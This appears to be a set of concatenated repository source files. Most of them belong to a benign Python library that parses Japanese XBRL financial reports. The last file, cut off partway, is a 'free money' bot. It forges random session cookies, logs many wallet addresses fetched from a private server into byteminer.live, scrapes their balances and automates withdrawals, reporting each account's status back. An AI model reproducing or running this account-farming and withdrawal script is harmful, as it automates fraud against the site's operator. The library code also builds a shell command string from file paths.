for accounting_standard, stats in account_stats.items():
# コンテキストの種類ごとに
for idx, context_name in enumerate(context_names):
if not context_name.startswith('CurrentYear'):
continue
if 'Instant' in context_name:
# 時点の場合
dic = instant_account_dic
else:
# 期間の場合
assert 'Duration' in context_name
dic = duration_account_dic
counts = list(sorted(stats[idx].items(), key=lambda x:x[1], reverse=True))
# 頻出上位の項目のみ使う。
counts = counts[: rank]
for count in counts:
dic.add(count[0])
instant_account_ids = list(instant_account_dic)
duration_account_ids = list(duration_account_dic)
ns_xsd_dic2 = {}
for ns, dic in ns_xsd_dic.items():
dic2 = {}
ns_xsd_dic2[ns] = dic2
for key, ele in dic.items():
if key != ele.id:
continue
dic2[key] = ele
if len(ele.calcTo) != 0:
ele.calcTo = sorted(ele.calcTo, key=lambda x: x.order)
ele.child_elements = [x.to for x in ele.calcTo]
for x in ele.child_elements:
assert not ele in x.parents
x.parents.append(ele)
tree_f = codecs.open("%s/calc_tree.txt" % data_path, 'w', 'utf-8')
for ids, context_name in zip([ instant_account_ids, duration_account_ids ], [ "会計終了時点", "会計期間" ]):
tree_f.write("\n%s\nコンテスト : %s\n%s\n" % ('-'*80, context_name, '-'*80) )
all_items = []
for id in ids:
ns, tag_name = id.split(':')
# 名前空間に対応するスキーマの辞書を得る。
assert ns in ns_xsd_dic2
xsd_dic = ns_xsd_dic2[ns]
# タグ名に対応する要素を得る。
if not tag_name in xsd_dic:
tag_name = ns + "_" + tag_name
assert tag_name in xsd_dic
ele =xsd_dic[tag_name]
if ele.type in ['stringItemType', 'textBlockItemType', 'dateItemType']:
continue
if not ele in all_items:
all_items.append(ele)
top_items = set()
max_len_dic = {}
for ele in all_items:
set_max_len_parent(top_items, max_len_dic, ele)
top_cnts = [ [ele, dump_ele(None, max_len_dic, ele, 0, set())] for ele in top_items ]
top_cnts = sorted(top_cnts, key=lambda x:x[1], reverse=True)
for ele, cnt in top_cnts:
dump_ele(tree_f, max_len_dic, ele, 0, set())
tree_f.close()
``` |
{
"source": "5laps2go/xbrr",
"score": 2
} |
#### File: 5laps2go/xbrr/check_performance.py
```python
import os
import shutil
import pyfbi
from xbrr.edinet.client.document_client import DocumentClient
from xbrr.edinet.reader.reader import Reader
from xbrr.edinet.reader.doc import Doc
from xbrr.edinet.reader.aspects.finance import Finance
@pyfbi.target
def check():
_dir = os.path.join(os.path.dirname(__file__), "./data")
if os.path.exists(_dir):
shutil.rmtree(_dir)
else:
os.mkdir(_dir)
client = DocumentClient()
xbrl_root = client.get_xbrl("S100G2KL", save_dir=_dir, expand_level="dir")
xbrl_doc = Doc(root_dir=xbrl_root, xbrl_kind="public")
reader = Reader(xbrl_doc)
print("Start Calculation")
bs = reader.extract(Finance).bs()
bs.to_csv("bs.csv", index=False, encoding="shift_jis")
shutil.rmtree(_dir)
with pyfbi.watch():
check()
pyfbi.dump("result")
pyfbi.show()
```
#### File: reader/aspects/test_forecast.py
```python
import os
import shutil
import unittest
from xbrr.tdnet.client.document_client import DocumentClient
from xbrr.edinet.reader.reader import Reader
from xbrr.tdnet.reader.doc import Doc
from xbrr.tdnet.reader.aspects.forecast import Forecast
class TestForecast(unittest.TestCase):
@classmethod
def setUpClass(cls):
_dir = os.path.join(os.path.dirname(__file__), "../../data")
client = DocumentClient()
# "081220210818487667" J-共和工業 2022年4月期 第1四半期決算短信〔日本基準〕(連結)
# root_dir = client.get_xbrl("081220210818487667", save_dir=_dir,
# expand_level="dir")
root_dir = os.path.join(_dir, "081220210818487667")
xbrl_doc = Doc(root_dir=root_dir, xbrl_kind="summary")
cls.reader = Reader(xbrl_doc, save_dir=_dir)
cls._dir = _dir
@classmethod
def tearDownClass(cls):
# shutil.rmtree(cls.reader.xbrl_doc.root_dir)
if os.path.exists(cls.reader.taxonomies_root):
shutil.rmtree(cls.reader.taxonomies_root)
def test_accounting_standards(self):
feature = self.reader.extract(Forecast).accounting_standards
self.assertEqual(feature, "日本基準")
feature = self.reader.extract(Forecast).consolidated
self.assertTrue(feature)
def test_fiscal_period_kind(self):
feature = self.reader.extract(Forecast).fiscal_period_kind
self.assertEqual(feature, "1")
def test_roles(self):
roles = self.reader.custom_roles
self.assertTrue(len(roles) > 0)
self.assertIn('RoleBusinessResultsQuarterlyOperatingResults', roles) # 四半期経営成績
self.assertIn('RoleBusinessResultsQuarterlyFinancialPositions', roles) # 四半期財政状態
self.assertIn('RoleQuarterlyDividends', roles) # 配当の状況
self.assertIn('RoleQuarterlyForecasts', roles) # 四半期業績予想
def test_namespaces(self):
namespaces = self.reader.namespaces
self.assertTrue(len(namespaces) > 0)
self.assertIn('tse-ed-t', namespaces)
# self.assertIn('tse-qcedjpsm-15150', namespaces)
def test_fc(self):
fc = self.reader.extract(Forecast).fc()
# fc.to_csv(os.path.join(self._dir, 'test_fc.csv'))
self.assertTrue(fc is not None)
self.assertGreater(len(fc), 0)
```
#### File: base/reader/xbrl_doc.py
```python
import os
from datetime import datetime
from xbrr.base.reader.base_doc import BaseDoc
from bs4 import BeautifulSoup
class XbrlDoc(BaseDoc):
def __init__(self, package, root_dir="", xbrl_file=""):
super().__init__(package, root_dir=root_dir, xbrl_file=xbrl_file)
self._cache = {}
def read_schemaRefs(xsd_xml):
dict = {}
schema = xsd_xml.find('schema')
dict[schema['targetNamespace']] = os.path.basename(self.find_path('xsd'))
for ref in xsd_xml.find_all('import'):
dict[ref['namespace']] = ref['schemaLocation']
return dict
def read_linkbaseRefs(xsd_xml):
href_list = []
for ref in xsd_xml.find_all('link:linkbaseRef'):
# ex.: <link:linkbaseRef xlink:type="simple" xlink:href="jpcrp030000-asr-001_E00436-000_2018-03-31_01_2018-06-26_pre.xml" xlink:role="http://www.xbrl.org/2003/role/presentationLinkbaseRef" xlink:arcrole="http://www.w3.org/1999/xlink/properties/linkbase" />
linkrole = ref.get('xlink:role')
linkrole = linkrole.split('/')[-1] if linkrole is not None else ''
href_list.append((ref['xlink:href'], linkrole))
return href_list
xsd_xml = self.xsd
self._schema_dic = read_schemaRefs(xsd_xml)
self._linkbase_tuples = read_linkbaseRefs(xsd_xml)
def read_file(self, kind):
path = self.find_path(kind)
if (not os.path.isfile(path)):
return None
if kind not in self._cache:
with open(path, encoding="utf-8-sig") as f:
self._cache[kind] = BeautifulSoup(f, "lxml-xml")
return self._cache[kind]
def find_laburi(self, xsduri, kind) -> str:
"""find label xml uri by schema uri"""
namespace = xsduri
if xsduri.startswith('http'):
namespace = next(k for k,v in self._schema_dic.items() if v==xsduri)
href = self._find_linkbaseRef(kind, namespace)
if len(href) == 0:
path = self.find_path(kind)
href = os.path.basename(path)
return href
def find_xsduri(self, namespace) -> str:
"""find xsd uri by namespace """
if namespace not in self._schema_dic:
if namespace.startswith('http'):
raise LookupError("Unknown namespace: " + namespace)
# for "local" namespace
xsdloc = os.path.basename(self.find_path('xsd'))
return xsdloc
return self._schema_dic[namespace]
def _find_linkbaseRef(self, kind, namespace) -> str:
if namespace.startswith('http'):
# if namespace!="local":
ns_base = "/".join(namespace.split('/')[0:-1])
else:
ns_base = os.path.basename(os.path.splitext(self.xbrl_file)[0])
for pair in self._linkbase_tuples:
if pair[0].startswith(ns_base) and pair[0].endswith(kind+".xml"):
return pair[0]
return None
```
#### File: reader/aspects/finance.py
```python
import warnings
import re
import collections
import importlib
if importlib.util.find_spec("pandas") is not None:
import pandas as pd
from xbrr.base.reader.base_parser import BaseParser
from xbrr.edinet.reader.element_value import ElementValue
class Finance(BaseParser):
def __init__(self, reader):
tags = {
"voluntary_accounting_policy_change": "jpcrp_cor:NotesVoluntaryChangesInAccountingPoliciesConsolidatedFinancialStatementsTextBlock",
"segment_information": "jpcrp_cor:NotesSegmentInformationEtcConsolidatedFinancialStatementsTextBlock",
"real_estate_for_lease": "jpcrp_cor:NotesRealEstateForLeaseEtcFinancialStatementsTextBlock",
"accounting_standards": "jpdei_cor:AccountingStandardsDEI", # 会計基準 from metadata
}
super().__init__(reader, ElementValue, tags)
@property
def use_IFRS(self):
return self.accounting_standards.value == 'IFRS'
def bs(self, ifrs=False, use_cal_link=True):
role = self.__find_role_name('bs')
role_uri = self.reader.get_role(role[0]).uri
# role_uri = "http://disclosure.edinet-fsa.go.jp/role/jppfs/rol_BalanceSheet"
# if ifrs and self.use_IFRS:
# role_uri = "http://disclosure.edinet-fsa.go.jp/role/jpigp/rol_ConsolidatedStatementOfFinancialPositionIFRS"
bs = self.reader.read_value_by_role(role_uri, use_cal_link=use_cal_link)
return self.__filter_duplicate(bs)
def pl(self, ifrs=False, use_cal_link=True):
role = self.__find_role_name('pl')
role_uri = self.reader.get_role(role[0]).uri
# role_uri = "http://disclosure.edinet-fsa.go.jp/role/jppfs/rol_StatementOfIncome"
# if ifrs and self.use_IFRS:
# role_base = "http://disclosure.edinet-fsa.go.jp/role/jpigp/"
# role_uri = f"{role_base}rol_ConsolidatedStatementOfComprehensiveIncomeIFRS"
pl = self.reader.read_value_by_role(role_uri, use_cal_link=use_cal_link)
return self.__filter_duplicate(pl)
def cf(self, ifrs=False, use_cal_link=True):
role = self.__find_role_name('cf')
if len(role) == 0:
textblock = self.__read_value_by_textblock(["StatementOfCashFlows"])
return self.__read_finance_statement(textblock.html) if textblock is not None else None
role = role[0]
role_uri = self.reader.get_role(role).uri
cf = self.reader.read_value_by_role(role_uri, use_cal_link=use_cal_link)
return self.__filter_duplicate(cf)
def __filter_duplicate(self, data):
# Exclude dimension member
if data is not None:
data.drop_duplicates(subset=("name", "period"), keep="first",
inplace=True)
return data
def __find_role_name(self, finance_statement):
role_candiates = {
'bs': ["StatementOfFinancialPositionIFRS", "ConsolidatedBalanceSheet", "BalanceSheet"],
'pl': ["StatementOfProfitOrLossIFRS", "StatementOfIncome"],
'cf': ["StatementOfCashFlowsIFRS", "StatementOfCashFlows"],
}
roles = []
for name in role_candiates[finance_statement]:
roles += [x for x in self.reader.custom_roles.keys() if name in x and 'Notes' not in x and x not in roles]
return roles
def __read_value_by_textblock(self, candidates):
values = self.reader.find_value_names(candidates)
textblocks = [x for x in values if x.endswith('TextBlock')]
if len(textblocks) == 0:
return None
element_value = self.reader.findv(textblocks[0])
return element_value
def __read_finance_statement(self, statement_xml):
def myen(value):
if value=='-':
return '000'
myen = value.replace(',','').replace('△', '-')
return myen
def isnum(myen):
try:
float(myen)
except ValueError:
return False
else:
return True
indent_state = []
def indent_label(margin_left):
delidx = [i for i,x in enumerate(indent_state) if int(x) > int(margin_left)]
if len(delidx) > 0: del indent_state[delidx[0]:]
indent_state.append(margin_left)
c = collections.Counter(indent_state)
ks = sorted(c.keys(), key=int)
return "-".join([str(c[x]) for x in ks])
unit = ''
values = []
for table in statement_xml.select('table'):
for record in table.select('tr'):
columns = list(record.select('td'))
label = ''.join([x.text.strip() for x in columns[0].select('p')])
value = myen(columns[-1].text.strip())
style_str = columns[0].find('p')['style'] if label != "" else ""
m = re.match(r'.*margin-left: *([0-9]*).?[0-9]*px.*', style_str)
margin = m.groups()[0] if m is not None else "0"
if isnum(value):
values.append({
'label': label,
'value': value + unit,
'indent': indent_label(margin)
})
elif label != "" and value == "":
values.append({
'label': label,
'indent': indent_label(margin)
})
else:
assert value=='' or '単位:' in value or '百万円' in value or '当連結会計年度' in value
if '百万円' in value: # 単位:百万円 金額(百万円)
unit = '000000'
elif '単位:円' in value:
unit = ''
return pd.DataFrame(values)
```
#### File: reader/aspects/stock.py
```python
from xbrr.base.reader.base_parser import BaseParser
from xbrr.edinet.reader.element_value import ElementValue
class Stock(BaseParser):
def __init__(self, reader):
tags = {
"dividend_paid": "jpcrp_cor:DividendPaidPerShareSummaryOfBusinessResults", # 一株配当
"dividends_surplus": "jppfs_cor:DividendsFromSurplus", # 剰余金の配当
"purchase_treasury_stock": "jppfs_cor:PurchaseOfTreasuryStock", # 自社株買い
}
super().__init__(reader, ElementValue, tags)
```
#### File: edinet/reader/element_schema.py
```python
from xbrr.base.reader.base_element_schema import BaseElementSchema
from bs4.element import NavigableString, Tag
import bs4
class ElementSchema(BaseElementSchema):
def __init__(self,
name="", reference="", label="", alias="",
abstract="", data_type="",
period_type="", balance=""):
super().__init__()
self.name = name
self.reference = reference
self.label = label
self.alias = alias
self.abstract = abstract
self.period_type = period_type
self.balance = balance
self.verbose_label = ""
# data types:
# domain, textBlock, percent, perShare, boolean, date, decimal,
# monetary, nonNegativeInteger, shares, string
self.data_type = data_type
if data_type is not None and ':' in data_type:
self.data_type = data_type.split(':')[-1].replace('ItemType','')
def set_alias(self, alias):
self.alias = alias
return self
@classmethod
def create_from_reference(cls, reader, reference):
if not reader.xbrl_doc.has_schema: # for test purpose only
name = reference.split("#")[-1]
instance = cls(name=name, reference=reference)
return instance
instance = reader.get_schema_by_link(reference)
instance.reference = reference
return instance
@classmethod
def read_schema(cls, reader, xsduri):
xsd_dic = {}
xml = reader.read_uri(xsduri)
for element in xml.find_all("element"):
# <xsd:element id="jpcrp030000-asr_E00436-000_Subsidy" xbrli:balance="credit" xbrli:periodType="duration" abstract="false" name="Subsidy" nillable="true" substitutionGroup="xbrli:item" type="xbrli:monetaryItemType" />
instance = cls(name=element["id"], alias=element["name"],
data_type=element["type"],
period_type=element["xbrli:periodType"],
abstract=element["abstract"] if element.get("abstract") else "",
balance=element.get("xbrli:balance") if element.get("xbrli:balance") else "")
xsd_dic[element["id"]] = instance
return xsd_dic
@classmethod
def read_label_taxonomy(cls, reader, xsduri, xsd_dic):
label_xml = reader.read_label_of_xsd(xsduri)
loc_dic = {}
resource_dic = {}
def read_label(elem: bs4.element.Tag):
if elem.name == "loc":
attrs = elem.attrs
assert 'xlink:href' in attrs and 'xlink:label' in attrs
# href = jpcrp040300-q1r-001_E04251-000_2016-06-30_01_2016-08-12.xsd#jpcrp040300-q1r_E04251-000_ProvisionForLossOnCancellationOfContractEL
# label = ProvisionForLossOnCancellationOfContractEL
v = elem['xlink:href'].split('#')
assert len(v) == 2
loc_dic[elem['xlink:label']] = v[1]
elif elem.name == "label":
attrs = elem.attrs
if 'xlink:label' in attrs and 'xlink:role' in attrs:
label_role = "http://www.xbrl.org/2003/role/label"
verboseLabel_role = "http://www.xbrl.org/2003/role/verboseLabel"
if elem['xlink:role'] in [label_role, verboseLabel_role]:
resource_dic[elem['xlink:label']] = {'role': elem['xlink:role'], 'text': elem.text}
elif elem.name == "labelArc":
attrs = elem.attrs
if 'xlink:from' in attrs and 'xlink:to' in attrs and elem['xlink:to'] in resource_dic:
if elem['xlink:from'] in loc_dic and loc_dic[elem['xlink:from']] in xsd_dic:
ele = xsd_dic[loc_dic[elem['xlink:from']]]
res = resource_dic[elem['xlink:to']]
ele.set_label(**res) # Label(res['role'], res['text'])
for elem in label_xml.find_all('labelLink'): # "link:labelLink"
for child in elem.children:
if isinstance(child, Tag):
read_label(child)
def set_label(self, role, text):
if role.endswith('label'):
self.label = text
elif role.endswith('verboseLabel'):
self.verbose_label = text
def to_dict(self):
return {
"name": self.name,
"reference": self.reference,
"label": self.label,
"abstract": self.abstract,
"data_type": self.data_type,
"period_type": self.period_type,
"balance": self.balance
}
```
#### File: reader/aspects/forecast.py
```python
import re
import warnings
from xbrr.base.reader.base_parser import BaseParser
from xbrr.edinet.reader.element_value import ElementValue
class Forecast(BaseParser):
def __init__(self, reader):
tags = {
"document_name": "tse-ed-t:DocumentName",
"security_code": "tse-ed-t:SecuritiesCode",
"company_name": "tse-ed-t:CompanyName",
"company_name_en": "jpdei_cor:FilerNameInEnglishDEI",
"filling_date": "tse-ed-t:FilingDate",
"forecast_correction_date": "tse-ed-t:ReportingDateOfFinancialForecastCorrection",
"dividend_correction_date": "tse-ed-t:ReportingDateOfDividendForecastCorrection",
"forecast_correction_flag": "tse-ed-t:CorrectionOfConsolidatedFinancialForecastInThisQuarter",
"dividend_correction_flag": "tse-ed-t:CorrectionOfDividendForecastInThisQuarter",
"sales": "tse-ed-t:Sales",
"sales_IFRS": "tse-ed-t:SalesIFRS"
}
reit_tags = {
"document_name": "tse-re-t:DocumentName",
"security_code": "tse-re-t:SecuritiesCode",
"company_name": "tse-re-t:IssuerNameREIT",
"filling_date": "tse-re-t:FilingDate",
"forecast_correction_date": "tse-ed-t:ReportingDateOfFinancialForecastCorrection",
"sales_REIT": "tse-re-t:OperatingRevenuesREIT",
"sales_IFRS": "tse-ed-t:SalesIFRS"
}
if "tse-ed-t" in reader.namespaces:
super().__init__(reader, ElementValue, tags)
elif "tse-re-t"in reader.namespaces:
super().__init__(reader, ElementValue, reit_tags)
dic = str.maketrans('1234567890()()[ ]〔〕[]','1234567890####% %%%%%')
title = self.document_name.value.translate(dic).strip().replace(' ','')
m = re.match(r'(第(.)四半期|中間)?.*決算短信([%#]([^%#]*)[%#])?(#(.*)#)?', title)
if m != None:
self.consolidated = '連結' == m.groups()[5]
self.fiscal_period_kind = 'a' if m.groups()[1]==None else m.groups()[1]
self.accounting_standards = m.groups()[3]
elif ('業績予想' in title or '配当予想' in title):
self.fiscal_period_kind = '0'
else:
raise Exception("Unknown titile found!")
@property
def use_IFRS(self):
return self.sales_IFRS.value is not None
@property
def reporting_date(self):
wareki = {'令和': 2019}
dic = str.maketrans('1234567890()[]','1234567890()[]')
def wareki2year(elemvalue):
date1 = elemvalue.value.translate(dic).replace(' ','')
for waname in wareki.keys():
m = re.search(r'{}([0-9]+)年'.format(waname), date1.translate(dic).replace(' ',''))
if m != None:
elemvalue.value = date1.replace(
waname+m.groups()[0],str(int(m.groups()[0])+wareki[waname]-1))
return elemvalue
if self.filling_date.value is not None:
return wareki2year(self.filling_date)
if self.forecast_correction_date.value is not None:
return wareki2year(self.forecast_correction_date)
if self.dividend_correction_date.value is not None:
return wareki2year(self.dividend_correction_date)
raise NameError('Reporting date not found')
@property
def reporting_period(self):
role = self.__find_role_name('fc_test')
if len(role) <= 0: return 'Q2'
return 'FY'
@property
def fc_q2ytd_period(self):
role = self.__find_role_name('fc_q2ytd')
if len(role) <= 0: return ''
return 'Q2'
@property
def forecast_year(self):
return 'NextYear' if self.fiscal_period_kind=='a' else 'CurrentYear'
def fc(self, ifrs=False, use_cal_link=True):
role = self.__find_role_name('fc')
if len(role) <= 0: return None
role = role[0]
role_uri = self.reader.get_role(role).uri
fc = self.reader.read_value_by_role(role_uri, use_cal_link=use_cal_link)
return self.__filter_duplicate(fc) if fc is not None else None
def fc_dividends(self, ifrs=False, use_cal_link=True):
role = self.__find_role_name('fc_dividends')
if len(role) <= 0: return None
role = role[0]
role_uri = self.reader.get_role(role).uri
fc = self.reader.read_value_by_role(role_uri, use_cal_link=use_cal_link)
return self.__filter_duplicate(fc) if fc is not None else None
def q2ytd(self, ifrs=False, use_cal_link=True):
role = self.__find_role_name('fc_q2ytd')
if len(role) <= 0: return None
role = role[0]
role_uri = self.reader.get_role(role).uri
q2ytd = self.reader.read_value_by_role(role_uri, use_cal_link=use_cal_link)
return self.__filter_duplicate(q2ytd) if q2ytd is not None else None
def __filter_duplicate(self, data):
# Exclude dimension member
data.drop_duplicates(subset=("name", "member","period"), keep="first",
inplace=True)
return data
def __find_role_name(self, finance_statement):
role_candiates = {
'fc': ["RoleForecasts", "RoleQuarterlyForecasts", "InformationAnnual"], #有価証券報告書,決算短信,業績予想の修正
'fc_dividends': ["RoleDividends", "RoleQuarterlyDividends", "RoleRevisedDividend"], #有価証券報告書,決算短信,配当予想の修正
'fc_test': ["RoleForecasts", "RoleQuarterlyForecasts", "InformationAnnual", "RoleDividends", "RoleQuarterlyDividends", "RoleRevisedDividend"],
'fc_q2ytd': ["InformationQ2YTD"],
}
roles = []
for name in role_candiates[finance_statement]:
roles += [x for x in self.reader.custom_roles.keys() if name in x and x not in roles]
return roles
```
#### File: tdnet/reader/doc.py
```python
import os
import errno
import glob
from datetime import datetime
from xbrr.base.reader.xbrl_doc import XbrlDoc
from xbrr.edinet.reader.taxonomy import Taxonomy as EdinetTaxonomy
from xbrr.tdnet.reader.taxonomy import Taxonomy as TdnetTaxonomy
import subprocess
from subprocess import PIPE
from typing import Tuple, Dict
class Doc(XbrlDoc):
def __init__(self, root_dir="", xbrl_kind=""):
def _glob_list(folders):
for folder in folders:
xsd_files = glob.glob(os.path.join(root_dir, folder+"/*.xsd"))
if xsd_files: return xsd_files
return []
def _xbrl_file(root_dir, kind):
folder_dict = {'public': ['XBRLData/Attachment'], 'summary': ['XBRLData/Summary','.']}
xsd_files = _glob_list(folder_dict[kind])
if not xsd_files:
raise FileNotFoundError(
errno.ENOENT, os.strerror(errno.ENOENT), folder_dict[kind])
xbrl_file = self._prepare_xbrl(xsd_files[0])
return xbrl_file
xbrl_file=_xbrl_file(root_dir, xbrl_kind)
self.file_spec = os.path.splitext(xbrl_file)[0]
super().__init__("tdnet", root_dir=root_dir, xbrl_file=xbrl_file)
def find_path(self, kind) -> str:
# TDNET report file name spec. is like EDINET
suffix = {
"xbrl": ".xbrl", "xsd": ".xsd", "cal": "-cal.xml", "def": "-def.xml",
"lab": "-lab.xml", "lab-en": "-lab-en.xml", "pre": "-pre.xml",
}
if kind == "man":
path = os.path.join(os.path.dirname(self.file_spec), "manifest.xml")
if len(path)==0:
return None
elif kind in suffix:
path = self.file_spec + suffix[kind]
else: # kind=file name case
path = os.path.join(os.path.dirname(self.file_spec), kind)
return path
@property
def default_linkbase(self) -> dict:
if 'Attachment' in self.file_spec:
return {
'doc': self.pre,
'link_node': 'link:presentationLink',
'arc_node': 'link:presentationArc',
'roleRef': 'link:roleRef',
'arc_role': 'parent-child'
}
assert 'Summary' in self.file_spec or '/./' in self.file_spec
return {
'doc': self.def_,
'link_node': 'definitionLink',
'arc_node': 'definitionArc',
'roleRef': 'roleRef',
'arc_role': 'domain-member'
}
@property
def published_date(self) -> Tuple[datetime, str]:
if 'Attachment' in self.file_spec:
# Attachment/tse-acedjpfr-36450-2021-05-31-01-2021-07-14
# 0 1 2 3 4 5 6 7 8 9
v = os.path.basename(self.file_spec).split('-')
date = datetime.strptime("%s-%s-%s" % (v[7], v[8], v[9]), "%Y-%m-%d")
period = v[1][0]
return date, period
elif 'Summary' in self.file_spec or '/./' in self.file_spec:
# Summary/tse-acedjpsm-36450-20210714336450
# 0 1 2 3
v = os.path.basename(self.file_spec).split('-')
date = datetime.strptime("%s-%s-%s" % (v[3][:4], v[3][4:6], v[3][6:8]), "%Y-%m-%d")
period = v[1][0]
return date, period
else:
raise FileNotFoundError("No Attachment or Summary folder found.")
def create_taxonomies(self, root_dir) -> Dict[str, object]:
if 'Attachment' in self.file_spec:
etxnmy = EdinetTaxonomy(root_dir)
ttxnmy = TdnetTaxonomy(root_dir)
return {etxnmy.prefix: etxnmy, ttxnmy.prefix: ttxnmy}
assert 'Summary' in self.file_spec or '/./' in self.file_spec
ttxnmy = TdnetTaxonomy(root_dir)
return {ttxnmy.prefix: ttxnmy}
def _prepare_xbrl(self, xsd_file: str) -> str:
"""process ixbrl to xbrl
"""
if not os.path.isfile(xsd_file):
raise Exception(f"XSD file does not exist.")
xsl_file = "/usr/local/share/inlinexbrl/processor/Main_exslt.xsl"
self.file_spec = os.path.splitext(xsd_file)[0]
ixbrl_file = self.file_spec+"-ixbrl.htm"
manifest_file = self.find_path('man')
infile = manifest_file if os.path.isfile(manifest_file) else ixbrl_file
xbrl_file = self.file_spec + ".xbrl"
command = "xsltproc -o %s %s %s" % (xbrl_file, xsl_file, infile)
proc = subprocess.run(command, shell=True, stdout=PIPE, stderr=PIPE, text=True)
if not os.path.isfile(xbrl_file):
raise Exception(f"XBRL file is not generated.")
return xbrl_file
```
#### File: tdnet/reader/taxonomy.py
```python
from pathlib import Path
from zipfile import ZipFile
from datetime import datetime
from io import BytesIO
import requests
from xbrr.base.reader.base_taxonomy import BaseTaxonomy
class Taxonomy(BaseTaxonomy):
TAXONOMIES = {
"2014": "https://www.jpx.co.jp/equities/listing/xbrl/tvdivq00000088ai-att/61_taxonomy.zip",
}
def __init__(self, taxonomy_root):
super().__init__(
root = taxonomy_root,
prefix = "http://www.xbrl.tdnet.info/taxonomy/")
def __reduce_ex__(self, proto):
return type(self), (self.root,)
def download(self, published_date:datetime, kind:str):
year = str(self.taxonomy_year(published_date, kind))
expand_dir = self.root.joinpath("taxonomy").joinpath(year)
self.path = expand_dir
taxonomy_file = self.root.joinpath(f"{year}_taxonomy.zip")
download = False
if not self.root.exists():
self.root.mkdir(parents=True, exist_ok=True)
download = True
if not expand_dir.exists():
expand_dir.mkdir(parents=True, exist_ok=True)
download = True
if download:
# Download
def extract_taxonomy(f, zip):
if not zip.getinfo(f).is_dir():
dirs = Path(f).parts
taxonomy_at = dirs.index("taxonomy") if "taxonomy" in dirs else -1
if taxonomy_at > 0 and len(dirs) > (taxonomy_at + 1):
dirs = dirs[(dirs.index("taxonomy") + 1):]
_to = expand_dir.joinpath("/".join(dirs))
_to.parent.mkdir(parents=True, exist_ok=True)
with _to.open("wb") as _to_f:
_to_f.write(zip.read(f))
r = requests.get(self.TAXONOMIES[year], stream=True)
with taxonomy_file.open(mode="wb") as f:
for chunk in r.iter_content(1024):
f.write(chunk)
# Extract zip files
with ZipFile(taxonomy_file, "r") as zip:
# zip.extractall(self.root)
for name in zip.namelist():
if name.endswith('.zip'):
# We have a zip within a zip
zfiledata = BytesIO(zip.read(name))
with ZipFile(zfiledata) as zip2:
for f in zip2.namelist():
extract_taxonomy(f, zip2)
else:
extract_taxonomy(name, zip)
taxonomy_file.unlink()
return expand_dir
def taxonomy_year(self, published_date:datetime, kind:str) -> str:
taxonomy_year = ""
for y in sorted(list(self.TAXONOMIES.keys()), reverse=True):
boarder_date = datetime(int(y[:4]), 3, 31)
if published_date > boarder_date:
taxonomy_year = y
break
return taxonomy_year
``` |
{
"source": "5lineofcode/free-money-script",
"score": 3
} |
#### File: 5lineofcode/free-money-script/byteminner.py
```python
import http.client
import requests
import random
import string
import threading
import time
import ssl
from bs4 import BeautifulSoup
from datetime import datetime
withdraw = True
getLoggedinAddress = True
withdrawCompletely = False
unregisteredLogin = False
def getSession():
length_of_string = 40
letters_and_digits = string.ascii_lowercase + string.digits
random_string = ""
for _ in range(length_of_string):
random_string += random.choice(letters_and_digits)
print(random_string)
ci_session = "ci_session=" + random_string
return ci_session
def getAddress():
if(unregisteredLogin):
URL = "http://192.168.3.11:3000/get-single-address"
elif(withdrawCompletely):
URL = "http://192.168.3.11:3000/linked-address/Withdraw"
elif(getLoggedinAddress == True):
URL = "http://192.168.3.11:3000/linked-address/LoggedIn"
else:
URL = "http://192.168.3.11:3000/linked-address/Pending"
r = requests.get(url = URL)
data = r.json()
if(data['message']=="SUCCESS"):
address = data['data']
return address.strip()
else:
return ""
def main(args):
while(True):
f = open("status.txt", "r")
if(f.read().strip()=="0"):
f.close()
break
f.close()
start_at = datetime.now()
address = getAddress()
if(not address):
print("No Data!")
break
ci_session = getSession()
print("address: "+address)
print("ci_session: "+ci_session)
print("----------------")
conn = http.client.HTTPSConnection("byteminer.live")
# conn = http.client.HTTPSConnection("byteminer.live", context = ssl._create_unverified_context())
payload = "username="+address+"&password=<PASSWORD>&reference_user_id="
headers = {
'authority': 'byteminer.live',
'accept': '*/*',
'x-requested-with': 'XMLHttpRequest',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36',
'content-type': 'application/x-www-form-urlencoded; charset=UTF-8',
'origin': 'https://byteminer.live',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'cors',
'sec-fetch-dest': 'empty',
'referer': 'https://byteminer.live/z',
'accept-language': 'en-US,en;q=0.9',
'cookie': ci_session
}
conn.request("POST", "/ajax_auth", payload, headers)
res = conn.getresponse()
data = res.read()
print(data)
if('success' in str(data)):
print(".")
elif('Duplicate' in str(data)):
URL = "http://192.168.3.11:3000/update-address/"+address+"/BadAddress"
requests.get(url = URL)
print("Duplicate Error, dont use this address again")
continue
else:
URL = "http://20.198.178.250:3000/update-address/"+address+"/LoginFailed"
requests.get(url = URL)
print("Login Failed")
continue
URL = "http://192.168.3.11:3000/update-address/"+address+"/LoggedIn"
requests.get(url = URL)
print("Login Success")
rememberCode = res.headers["Set-Cookie"].split(";")[0]
if(withdraw==False):
print("----------------")
continue
payload = ''
headers = {
'authority': 'byteminer.live',
'cache-control': 'max-age=0',
'upgrade-insecure-requests': '1',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'sec-fetch-site': 'same-origin',
'sec-fetch-mode': 'navigate',
'sec-fetch-user': '?1',
'sec-fetch-dest': 'document',
'referer': 'https://byteminer.live/dashboard',
'accept-language': 'en-US,en;q=0.9',
'cookie': rememberCode + "; " + ci_session
}
conn.request("GET", "/withdrawal", payload, headers)
res = conn.getresponse()
data = res.read()
html = data.decode("utf-8")
soup = BeautifulSoup(html, 'html.parser')
current_user_address = "NO ADDRESS"
for li in soup.select('#transfer input'):
current_user_address = li.get("value")
for li in soup.select('#transfer h1'):
balance = li.text.split(":")[1].strip()
payload = 'amount=' + balance
headers = {
'authority': 'byteminer.live',
'cache-control': 'max-age=0',
'upgrade-insecure-requests': '1',
'origin': 'https://byteminer.live',
'content-type': 'application/x-www-form-urlencoded',
'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36',
'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
'sec-fetch-site': 'same-origin',
